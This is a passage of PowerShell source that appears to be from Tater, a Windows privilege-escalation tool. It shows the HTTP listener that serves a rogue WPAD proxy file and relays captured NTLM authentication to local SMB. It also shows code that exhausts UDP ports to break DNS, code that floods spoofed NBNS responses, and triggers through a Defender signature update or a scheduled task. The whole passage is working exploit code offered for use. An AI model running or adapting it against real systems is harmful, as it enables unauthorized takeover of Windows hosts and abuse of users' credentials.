0x00,0x0a,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x58,
0x02,0x58,0x02,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00
if($SMB_relay_failed)
{
$tater.console_queue.Add("$(Get-Date -format 's') - SMB relay failed on $SMBRelayTarget")
BREAK SMB_relay_execute_loop
}
$k++
}
$tater.SMB_relay_active_step = 0
$SMB_relay_socket.Close()
if(!$SMB_relay_failed)
{
$tater.SMBRelay_success = $True
}
}
}
# HTTP Server ScriptBlock - HTTP listener
$HTTP_scriptblock =
{
param ($Command,$HTTPPort,$WPADDirectHosts,$WPADPort)
function NTLMChallengeBase64
{
$HTTP_timestamp = Get-Date
$HTTP_timestamp = $HTTP_timestamp.ToFileTime()
$HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))
$HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
0x00,0x00,0x00,0x05,0xc2,0x89,0xa2 +
$HTTP_challenge_bytes +
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
$HTTP_timestamp +
0x00,0x00,0x00,0x00,0x0a,0x0a
$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
$NTLM = 'NTLM ' + $NTLM_challenge_base64
$NTLM_challenge = $HTTP_challenge
return $NTLM
}
$SMBRelayTarget = "127.0.0.1"
$HTTP_port_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTPPort)
$WPADDirectHosts += "localhost"
$HTTP_content_length = $WPADPort.Length + 62
foreach($WPAD_direct_host in $WPADDirectHosts)
{
$HTTP_content_length += $WPAD_direct_host.Length + 43
$HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_content_length)
$WPAD_direct_host_bytes = [System.Text.Encoding]::UTF8.GetBytes($WPAD_direct_host)
$WPAD_direct_host_function_bytes = 0x69,0x66,0x20,0x28,0x64,0x6e,0x73,0x44,0x6f,0x6d,0x61,0x69,0x6e,0x49,
0x73,0x28,0x68,0x6f,0x73,0x74,0x2c,0x20,0x22 +
$WPAD_direct_host_bytes +
0x22,0x29,0x29,0x20,0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x22,0x44,0x49,
0x52,0x45,0x43,0x54,0x22,0x3b
$WPAD_direct_hosts_bytes += $WPAD_direct_host_function_bytes
}
$WPAD_port_bytes = [System.Text.Encoding]::UTF8.GetBytes($WPADPort)
:HTTP_listener_loop while ($tater.running)
{
if($tater.SMBRelay_success)
{
StopTater
}
$TCP_request = $NULL
$TCP_request_bytes = New-Object System.Byte[] 1024
$suppress_waiting_message = $false
while(!$tater.HTTP_listener.Pending() -and !$tater.HTTP_client.Connected)
{
if(!$suppress_waiting_message)
{
$tater.console_queue.Add("$(Get-Date -format 's') - Waiting for incoming HTTP connection")
$suppress_waiting_message = $true
}
Start-Sleep -s 1
if($tater.SMBRelay_success)
{
StopTater
}
}
if(!$tater.HTTP_client.Connected)
{
$tater.HTTP_client = $tater.HTTP_listener.AcceptTcpClient()
$HTTP_stream = $tater.HTTP_client.GetStream()
}
while ($HTTP_stream.DataAvailable)
{
$HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
}
$TCP_request = [System.BitConverter]::ToString($TCP_request_bytes)
if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*")
{
$HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3)
$HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$tater.request_RawUrl = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length)
if($tater.request_RawUrl -eq "")
{
$tater.request_RawUrl = "/"
}
}
if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*")
{
$HTTP_authorization_header = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46)
$HTTP_authorization_header = $HTTP_authorization_header.Substring(0,$HTTP_authorization_header.IndexOf("-0D-0A-"))
$HTTP_authorization_header = $HTTP_authorization_header.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$authentication_header = New-Object System.String ($HTTP_authorization_header,0,$HTTP_authorization_header.Length)
}
else
{
$authentication_header = ''
}
$HTTP_type = "HTTP"
$HTTP_request_type = ""
if ($tater.request_RawUrl -match '/wpad.dat')
{
$tater.response_StatusCode = 0x32,0x30,0x30
$HTTP_response_phrase = 0x4f,0x4b
$HTTP_WPAD_response = 0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x46,0x69,0x6e,0x64,0x50,0x72,
0x6f,0x78,0x79,0x46,0x6f,0x72,0x55,0x52,0x4c,0x28,0x75,0x72,0x6c,0x2c,0x68,
0x6f,0x73,0x74,0x29,0x7b +
$WPAD_direct_hosts_bytes +
0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x22,0x50,0x52,0x4f,0x58,0x59,0x20,0x31,
0x32,0x37,0x2e,0x30,0x2e,0x30,0x2e,0x31,0x3a +
$WPAD_port_bytes +
0x22,0x3b,0x7d
$NTLM = ''
$HTTP_request_type = "WPAD"
}
elseif ($tater.request_RawUrl -eq '/GETHASHES')
{
$tater.response_StatusCode = 0x34,0x30,0x31
$HTTP_response_phrase = 0x4f,0x4b
$NTLM = 'NTLM'
$HTTP_request_type = "NTLM"
}
else
{
$tater.response_StatusCode = 0x33,0x30,0x32
$HTTP_location = 0x43,0x61,0x63,0x68,0x65,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x3a,0x20,0x70,0x72,
0x69,0x76,0x61,0x74,0x65,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,
0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,
0x61,0x72,0x73,0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x45,0x78,0x70,0x69,
0x72,0x65,0x73,0x3a,0x20,0x4d,0x6f,0x6e,0x2c,0x20,0x30,0x31,0x20,0x4a,0x61,0x6e,0x20,
0x30,0x30,0x30,0x31,0x20,0x30,0x30,0x3a,0x30,0x30,0x3a,0x30,0x30,0x20,0x47,0x4d,0x54,
0x0d,0x0a,0x4c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3a,0x20,0x68,0x74,0x74,0x70,0x3a,
0x2f,0x2f,0x6c,0x6f,0x63,0x61,0x6c,0x68,0x6f,0x73,0x74,0x3a +
$HTTP_port_bytes +
0x2f,0x47,0x45,0x54,0x48,0x41,0x53,0x48,0x45,0x53,0x0d,0x0a
$HTTP_response_phrase = 0x4f,0x4b
$NTLM = ''
$HTTP_request_type = "Redirect"
if($tater.HTTP_client_handle_old -ne $tater.HTTP_client.Client.Handle)
{
$tater.console_queue.Add("$(Get-Date -format 's') - Attempting to redirect to http://localhost:" + "$HTTPPort/gethashes and trigger relay")
}
}
if(($tater.request_RawUrl_old -ne $tater.request_RawUrl -and $tater.HTTP_client_handle_old -ne $tater.HTTP_client.Client.Handle) -or $tater.HTTP_client_handle_old -ne $tater.HTTP_client.Client.Handle)
{
$tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for " + $tater.request_RawUrl + " received from " + $tater.HTTP_client.Client.RemoteEndpoint.Address)
}
if($authentication_header.StartsWith('NTLM '))
{
$authentication_header = $authentication_header -replace 'NTLM ',''
[byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
$tater.response_StatusCode = 0x34,0x30,0x31
$HTTP_response_phrase = 0x4f,0x4b
if ($HTTP_request_bytes[8] -eq 1)
{
if($tater.SMB_relay_active_step -eq 0)
{
$tater.SMB_relay_active_step = 1
$tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by " + $tater.HTTP_client.Client.RemoteEndpoint.Address)
$tater.console_queue.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + "$SMBRelayTarget")
$SMB_relay_socket = New-Object System.Net.Sockets.TCPClient
$SMB_relay_socket.connect($SMBRelayTarget,"445")
if(!$SMB_relay_socket.connected)
{
$tater.console_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding")
$tater.SMB_relay_active_step = 0
}
if($tater.SMB_relay_active_step -eq 1)
{
$SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes
$tater.SMB_relay_active_step = 2
$SMB_relay_bytes = $SMB_relay_bytes[2..$SMB_relay_bytes.Length]
$SMB_user_ID = $SMB_relay_bytes[34..33]
$SMB_relay_NTLMSSP = [System.BitConverter]::ToString($SMB_relay_bytes)
$SMB_relay_NTLMSSP = $SMB_relay_NTLMSSP -replace "-",""
$SMB_relay_NTLMSSP_index = $SMB_relay_NTLMSSP.IndexOf("4E544C4D53535000")
$SMB_relay_NTLMSSP_bytes_index = $SMB_relay_NTLMSSP_index / 2
$SMB_domain_length = DataLength ($SMB_relay_NTLMSSP_bytes_index + 12) $SMB_relay_bytes
$SMB_domain_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 12)..($SMB_relay_NTLMSSP_bytes_index + 19)]
$SMB_target_length = DataLength ($SMB_relay_NTLMSSP_bytes_index + 40) $SMB_relay_bytes
$SMB_target_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 40)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length)]
$SMB_relay_NTLM_challenge = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 24)..($SMB_relay_NTLMSSP_bytes_index + 31)]
$SMB_reserved = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 32)..($SMB_relay_NTLMSSP_bytes_index + 39)]
$SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)]
$HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 +
$SMB_domain_length_offset_bytes +
0x05,0xc2,0x89,0xa2 +
$SMB_relay_NTLM_challenge +
$SMB_reserved +
$SMB_target_length_offset_bytes +
$SMB_relay_target_details
$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
$NTLM = 'NTLM ' + $NTLM_challenge_base64
$NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes
$tater.HTTP_challenge_queue.Add($tater.HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + $tater.HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge)
$tater.console_queue.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge " + "for relay from $SMBRelayTarget")
$tater.console_queue.Add("$(Get-Date -format 's') - Providing challenge " + "$NTLM_challenge for relay to " + $tater.HTTP_client.Client.RemoteEndpoint.Address)
$tater.SMB_relay_active_step = 3
}
else
{
$NTLM = NTLMChallengeBase64
}
}
else
{
$NTLM = NTLMChallengeBase64
}
$tater.response_StatusCode = 0x34,0x30,0x31
$HTTP_response_phrase = 0x4f,0x4b
}
elseif ($HTTP_request_bytes[8] -eq 3)
{
$NTLM = 'NTLM'
$HTTP_NTLM_offset = $HTTP_request_bytes[24]
$HTTP_NTLM_length = DataLength 22 $HTTP_request_bytes
$HTTP_NTLM_domain_length = DataLength 28 $HTTP_request_bytes
$HTTP_NTLM_domain_offset = DataLength 32 $HTTP_request_bytes
if($HTTP_NTLM_domain_length -eq 0)
{
$HTTP_NTLM_domain_string = ''
}
else
{
$HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_length 0 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes
}
$HTTP_NTLM_user_length = DataLength 36 $HTTP_request_bytes
$HTTP_NTLM_host_length = DataLength 44 $HTTP_request_bytes
if ([System.BitConverter]::ToString($HTTP_request_bytes[16]) -eq '58' -and [System.BitConverter]::ToString($HTTP_request_bytes[24]) -eq '58' -and [System.BitConverter]::ToString($HTTP_request_bytes[32]) -eq '58')
{
$HTTP_NTLM_user_string = ''
$HTTP_NTLM_host_string = ''
}
else
{
$HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_length $HTTP_NTLM_domain_length 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes
$HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_length $HTTP_NTLM_domain_length $HTTP_NTLM_user_length $HTTP_NTLM_domain_offset $HTTP_request_bytes
}
$NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
$NTLM_response = $NTLM_response.Insert(32,':')
$tater.response_StatusCode = 0x32,0x30,0x30
$HTTP_response_phrase = 0x4f,0x4b
$NTLM_challenge = ''
if ($tater.SMB_relay_active_step -eq 3)
{
$tater.console_queue.Add("$(Get-Date -format 's') - Sending response for " + "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to " + "$SMBRelaytarget")
$SMB_relay_response_return_bytes = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_user_ID
$SMB_relay_response_return_bytes = $SMB_relay_response_return_bytes[1..$SMB_relay_response_return_bytes.Length]
if(!$SMB_relay_failed -and [System.BitConverter]::ToString($SMB_relay_response_return_bytes[9..12]) -eq ('00-00-00-00'))
{
$tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay " + "authentication successful for $HTTP_NTLM_domain_string\" + "$HTTP_NTLM_user_string on $SMBRelayTarget")
$tater.SMB_relay_active_step = 4
SMBRelayExecute $SMB_relay_socket $SMB_user_ID
}
else
{
$tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay " + "authentication failed for $HTTP_NTLM_domain_string\" + "$HTTP_NTLM_user_string on $SMBRelayTarget")
$tater.SMB_relay_active_step = 0
$SMB_relay_socket.Close()
}
}
}
else
{
$NTLM = 'NTLM'
}
}
$HTTP_timestamp = Get-Date -format r
$HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp)
$HTTP_WWW_authenticate_header = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,
0x74,0x65,0x3a,0x20
if($NTLM)
{
$NTLM = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
$HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
$tater.response_StatusCode +
0x20 +
$HTTP_response_phrase +
0x0d,0x0a,0x43,0x61,0x63,0x68,0x65,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x3a,
0x20,0x70,0x72,0x69,0x76,0x61,0x74,0x65,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,
0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,
0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,
0x0d,0x0a,0x45,0x78,0x70,0x69,0x72,0x65,0x73,0x3a,0x20,0x4d,0x6f,0x6e,0x2c,0x20,
0x30,0x31,0x20,0x4a,0x61,0x6e,0x20,0x30,0x30,0x30,0x31,0x20,0x30,0x30,0x3a,0x30,
0x30,0x3a,0x30,0x30,0x20,0x47,0x4d,0x54,0x0d,0x0a +
$HTTP_WWW_authenticate_header +
$NTLM +
0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,
0x3a,0x20,0x30,0x0d,0x0a,0x0d,0x0a
}
elseif($HTTP_request_type -eq 'WPAD')
{
$HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
$tater.response_StatusCode +
0x20 +
$HTTP_response_phrase +
0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,
0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,
0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,
0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 +
$HTTP_content_length_bytes +
0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,
0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,
0x0a,0x44,0x61,0x74,0x65,0x3a +
$HTTP_timestamp +
0x0d,0x0a,0x0d,0x0a +
$HTTP_WPAD_response
}
elseif($HTTP_request_type -eq 'Redirect')
{
$HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
$tater.response_StatusCode +
0x20 +
$HTTP_response_phrase +
0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,
0x3a,0x20,0x30,0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,
0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,
0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a +
$HTTP_location +
0x44,0x61,0x74,0x65,0x3a +
$HTTP_timestamp +
0x0d,0x0a,0x0d,0x0a
}
else
{
$HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x20 +
$tater.response_StatusCode +
0x20 +
$HTTP_response_phrase +
0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,
0x3a,0x20,0x31,0x30,0x37,0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,
0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,
0x2f,0x32,0x2e,0x30,0x0d,0x0a,0x44,0x61,0x74,0x65,0x3a +
$HTTP_timestamp +
0x0d,0x0a,0x0d,0x0a
}
$HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length)
$HTTP_stream.Flush()
start-sleep -s 1
$tater.request_RawUrl_old = $tater.request_RawUrl
$tater.HTTP_client_handle_old= $tater.HTTP_client.Client.Handle
}
}
$exhaust_UDP_scriptblock =
{
$tater.exhaust_UDP_running = $true
$tater.console_queue.Add("$(Get-Date -format 's') - Trying to exhaust UDP source ports so DNS lookups will fail")
$UDP_socket_list = New-Object "System.Collections.Generic.List[Net.Sockets.Socket]"
$UDP_failed_ports_list = New-Object "System.Collections.Generic.List[Int]"
$i=0
for ($i = 0; $i -le 65535; $i++)
{
try
{
if ($i -ne 137 -and $i -ne 53)
{
$IP_end_point = New-Object System.Net.IPEndpoint([System.Net.IPAddress]::Any,$i)
$UDP_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::Udp)
$UDP_socket.Bind($IP_end_point)
$UDP_socket_list.Add($UDP_socket)
}
}
catch
{
$UDP_failed_ports_list.Add($i);
$tater.console_queue.Add("$(Get-Date -format 's') - Couldn't bind to UDP port $i")
}
}
$tater.UDP_exhaust_success = $false
while (!$tater.UDP_exhaust_success)
{
if(!$suppress_flush_message)
{
$tater.console_queue.Add("$(Get-Date -format 's') - Flushing DNS resolver cache")
$suppress_flush_message = $true
}
DnsFlushResolverCache
try
{
[System.Net.Dns]::GetHostEntry("microsoft.com")
}
catch
{
$tater.console_queue.Add("$(Get-Date -format 's') - DNS lookup failed so UDP exhaustion worked")
$tater.UDP_exhaust_success = $true
break
}
$tater.console_queue.Add("$(Get-Date -format 's') - DNS lookup succeeded so UDP exhaustion failed")
foreach ($UDP_port in $UDP_failed_ports_list)
{
try
{
$IP_end_point = New-Object System.Net.IPEndpoint([System.Net.IPAddress]::Any,$i)
$UDP_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::Udp)
$UDP_socket.Bind($IP_end_point)
$UDP_socket_list.Add($UDP_socket)
$UDP_failed_ports.Remove($UDP_port)
}
catch
{
$tater.console_queue.Add("$(Get-Date -format 's') - Failed to bind to $UDP_port during cleanup")
}
}
}
$tater.exhaust_UDP_running = $false
}
$spoofer_scriptblock =
{
param ($IP,$SpooferIP,$Hostname,$NBNSLimit)
$Hostname = $Hostname.ToUpper()
$hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,
0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00
$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($Hostname)
$hostname_encoded = [System.BitConverter]::ToString($hostname_encoded)
$hostname_encoded = $hostname_encoded.Replace("-","")
$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded)
for ($i=0; $i -lt $hostname_encoded.Count; $i++)
{
if($hostname_encoded[$i] -gt 64)
{
$hostname_bytes[$i] = $hostname_encoded[$i] + 10
}
else
{
$hostname_bytes[$i] = $hostname_encoded[$i] + 17
}
}
$NBNS_response_packet = 0x00,0x00,0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 +
$hostname_bytes +
0x00,0x20,0x00,0x01,0x00,0x00,0x00,0xa5,0x00,0x06,0x00,0x00 +
([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() +
0x00,0x00,0x00,0x00
while($tater.exhaust_UDP_running)
{
Start-Sleep -s 2
}
$tater.console_queue.Add("$(Get-Date -format 's') - Flushing DNS resolver cache")
DnsFlushResolverCache
$tater.console_queue.Add("$(Get-Date -format 's') - Starting NBNS spoofer to resolve $Hostname to $SpooferIP")
$send_socket = New-Object System.Net.Sockets.UdpClient(137)
$destination_IP = [System.Net.IPAddress]::Parse($IP)
$destination_point = New-Object Net.IPEndpoint($destination_IP,137)
$send_socket.Connect($destination_point)
while ($tater.running)
{
:NBNS_spoofer_loop while (!$tater.hostname_spoof -and $tater.running)
{
for ($i = 0; $i -lt 255; $i++)
{
for ($j = 0; $j -lt 255; $j++)
{
$NBNS_response_packet[0] = $i
$NBNS_response_packet[1] = $j
$send_socket.Send($NBNS_response_packet,$NBNS_response_packet.Length)
if($tater.hostname_spoof -and $NBNSLimit -eq 'Y')
{
break NBNS_spoofer_loop
}
}
}
}
Start-Sleep -m 5
}
$send_socket.Close()
}
$tater_scriptblock =
{
param ($NBNS,$NBNSLimit,$RunTime,$SpooferIP,$Hostname,$HTTPPort)
if($RunTime)
{
$tater_timeout = new-timespan -Minutes $RunTime
$tater_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
}
while ($tater.running)
{
if($tater.trigger -ne 2)
{
try
{
$Hostname_IP = [System.Net.Dns]::GetHostEntry($Hostname).AddressList[0].IPAddressToString
}
catch
{
# Don't need output for this
}
if($Hostname_IP -eq $SpooferIP)
{
if(!$suppress_spoofed_message)
{
$tater.console_queue.Add("$(Get-Date -format 's') - $Hostname has been spoofed to $SpooferIP")
$suppress_spoofed_message = $true
}
if($NBNSLimit -eq 'Y')
{
$tater.hostname_spoof = $true
}
$hostname_spoof = $true
$Hostname_IP = ""
}
elseif((!$Hostname_IP -or $Hostname_IP -ne $SpooferIP) -and $NBNS -eq 'Y')
{
$tater.hostname_spoof = $false
$hostname_spoof = $false
}
}
if(!$tater.SMBRelay_success -and $tater.trigger -eq 1)
{
if(Test-Path "C:\Program Files\Windows Defender\MpCmdRun.exe")
{
if(($process_defender.HasExited -or !$process_defender) -and !$tater.SMB_relay_success -and $hostname_spoof)
{
$tater.console_queue.Add("$(Get-Date -format 's') - Running Windows Defender signature update")
$process_defender = Start-Process -FilePath "C:\Program Files\Windows Defender\MpCmdRun.exe" -Argument SignatureUpdate -WindowStyle Hidden -passthru
}
}
else
{
$tater.console_queue.Add("Windows Defender not found")
}
}
elseif(!$tater.SMBRelay_success -and $tater.trigger -eq 2)
{
$service_webclient = Get-Service WebClient
if($service_webclient.Status -eq 'Stopped')
{
$tater.console_queue.Add("$(Get-Date -format 's') - Starting WebClient service")
Start-Process -FilePath "cmd.exe" -Argument "/C pushd \\live.sysinternals.com\tools" -WindowStyle Hidden -passthru -Wait
}
if($service_webclient.Status -eq 'Running' -and !$tater.task_added -and !$tater.SMBRelay_success)
{
$timestamp_add = (Get-Date).AddMinutes(1)
$timestamp_add_string = $timestamp_add.ToString("HH:mm")
$tater.task = $tater.taskname
if($tater.task_delete)
{
$tater.task += "_"
$tater.task += Get-Random
}
$tater.console_queue.Add("$(Get-Date -format 's') - Adding scheduled task " + $tater.task)
$process_scheduled_task = "/C schtasks.exe /Create /TN " + $tater.task + " /TR \\127.0.0.1@$HTTPPort\test /SC ONCE /ST $timestamp_add_string /F"
Start-Process -FilePath "cmd.exe" -Argument $process_scheduled_task -WindowStyle Hidden -passthru -Wait
$schedule_service = new-object -com("Schedule.Service")
$schedule_service.connect()
$scheduled_task_list = $schedule_service.getfolder("\").gettasks(1)
$tater.task_added = $false
foreach($scheduled_task in $scheduled_task_list)
{
if($scheduled_task.name -eq $tater.task)
{
$tater.task_added = $true
}
}
$schedule_service.Quit()
if(!$tater.task_added -and !$tater.SMBRelay_success)
{
$tater.console_queue.Add("$(Get-Date -format 's') - Adding scheduled task " + $tater.task + " failed")
StopTater
}
}
elseif($tater.task_added -and (Get-Date) -ge $timestamp_add.AddMinutes(2))
{
$tater.console_queue.Add("$(Get-Date -format 's') - Something went wrong with the service")
StopTater
}
}
if($tater.SMBRelay_success)
{
Stop-Process -id $process_defender.Id
}
if($RunTime)
{
if($tater_stopwatch.Elapsed -ge $tater_timeout)
{
StopTater
}
}
Start-Sleep -m 5
}
}
# HTTP Listener Startup Function
function HTTPListener()
{
if($WPADPort -eq '80')
{
$tater.HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::loopback,$HTTPPort)
}
else
{
$tater.HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort)
}
$tater.HTTP_listener = New-Object System.Net.Sockets.TcpListener $tater.HTTP_endpoint
$tater.HTTP_listener.Start()
$HTTP_runspace = [RunspaceFactory]::CreateRunspace()
$HTTP_runspace.Open()
$HTTP_runspace.SessionStateProxy.SetVariable('tater',$tater)
$HTTP_powershell = [PowerShell]::Create()
$HTTP_powershell.Runspace = $HTTP_runspace
$HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
$HTTP_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null
$HTTP_powershell.AddScript($SMB_relay_response_scriptblock) > $null
$HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
$HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
$HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Command).AddArgument($HTTPPort).AddArgument(
$WPADDirectHosts).AddArgument($WPADPort) > $null
$HTTP_powershell.BeginInvoke() > $null
}
# Exhaust UDP Startup Function
function ExhaustUDP()
{
$exhaust_UDP_runspace = [RunspaceFactory]::CreateRunspace()
$exhaust_UDP_runspace.Open()
$exhaust_UDP_runspace.SessionStateProxy.SetVariable('tater',$tater)
$exhaust_UDP_powershell = [PowerShell]::Create()
